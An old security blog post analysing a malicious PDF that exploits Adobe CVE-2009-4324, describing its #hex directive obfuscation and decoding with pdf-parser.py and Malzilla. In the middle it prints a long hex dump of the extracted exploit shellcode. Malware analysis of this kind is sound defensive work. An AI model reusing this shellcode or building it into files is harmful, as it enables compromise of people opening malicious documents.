Tuesday, January 12, 2010

Adobe CVE-2009-4324 – Another one with AsciiHexDecode waiting for the patch day

Many thanks to contagiodump for the following PDF:

http://contagiodump.blogspot.com/2010/01/jan-7-us-j-indiastrategicdialogue-from.html

In the document above it’s been detected the following PDF “not so rare” method for obfuscating the PDF directives:

sshot001

The #<value> sequences are evaluated by Adobe PDF reader as ASCII chars. So the snippet above became the following:

sshot002

To decode stream it’s been used pdf-parser.py and redirect the object into the clearObjects :

sshot003

An interesting  decoded stream it’s show at first lookup as the following screenshot:

sshot004

As already reported very well in other web site and forum the code is ready to been analyzed with tools such as Malzilla.  So:

sshot005
sshot006

The packed shell code seems the following:

414141414141e801000000008b0c2483c4048d49124180316780399075f70d450f6
74b67670f677b67670f677767670f648067670f454b67670d670f42746667339b0f
f45583f30fa3ea78130fd55168740f30016a980f3648c5660f5e851ae40fe8957f0
60f24d9cbbc0f8ac898d30fce45fec60fe9746dcb0ffce0ec82ec93ea19b754bcd0
634c843354b503ec3d57ec2c6bec2e7bec6eec0e6fca5af45583f3126707ec225be
c2b621f64aaec3e4764ba549820ec53dc6492fe68d9615da3136fa6ad6064b7218c
965c33437b1283ec3e4364ba01ec5b1cec3e7b64ba644bdcf238cc30065af45583f
312c9e68b676f6767ec8bec209be4a762ee209bec208be4a762ee208b0d679830b7
54ae54bce75f5d12662426e75b6f5d129e24e49c6512942e64a6eee26766676754a
e26e75b6f45129ea1636f670d670fe76767670d640d670d640f676767e7ecd26766
6767318f676767673fe4a76a3732ec8bec209b9887ee2053320f6766676798308fe
ad267666767310d670d67329830bf0d670d670d650d670d670f67676727318f6767
67673fe4a76a3732ec8bec209b9887e49f6768e90b656767eee267616767ec3823e
c10530d670d673431983087ec382fa0e263616767676367670d67eae26760676737
0f67636767eae26765676737ec105331983093eca44a67636767e49f671861eefa6
361676754aeead36a67656767cb55a6a7af64e09deadb6a67656767cde09d265cea
6361676712b90d67eae2636067673798d263616767eae2676567673798d26761676
798309fe68c67636767e49c6718e398d2676167679830970d67ead267666767318f
676767673fe4a76a3732ec8bec208b98870d670d6798102b9810539830870d67eae
26760676737981037eae2676667673798105398309354a727e71b626767129fec28
37e09cea1b6267ead26766676794c3e09c0d670d670d650d670d670f67676727328
f676767673fe4a76a3732ec8bec209b9887e49f6768e95b666767eee267616767ec
385bec10530d670d673431983087ec3827a0e263616767676367670d67eae267606
767370f67636767eae2676567673731983093eca44a67636767e49f671861eefa63
6167670d67eae2636067673798d263616767eae2676567673798d26761676798309
fe68c67636767e49c6718cc98d267616767983097ead2676667670f67666767310d
679830bba1e2986767674554ae26e7db6a67666767671292a0e36a6766676745474
814e4a66301a0e36a676667674745e4a665e09c54b5ea137267cbeadb6a67666767
cd26255b67128a2ea1e36a6766676745a0e28c676767242a2349a0e288676767223
f224701a0e2946767674804a1e29267676747a0e2916767671306140ca0e29d6767
670b0e1413a1e29967676741e09ceae28c6767670d67378f676767673fe4a76a373
2ec8bec208b98870d670d98983083f7f7f7f7f7f7f70000

The VirusTotal response:

http://www.virustotal.com/analisis/6b11d73965e62de381f2ea9b2f3de4fdbf461e970fee8cb4b90e7a62f88c2aa0-1263296898

The ThreatExpert response:
http://www.threatexpert.com/report.aspx?md5=88a653e2d85649e0b4ae48a1dd711f5e

At first sight the shellcode needs to be launched in the Adobe PDF Reader context.

No comments:

Post a Comment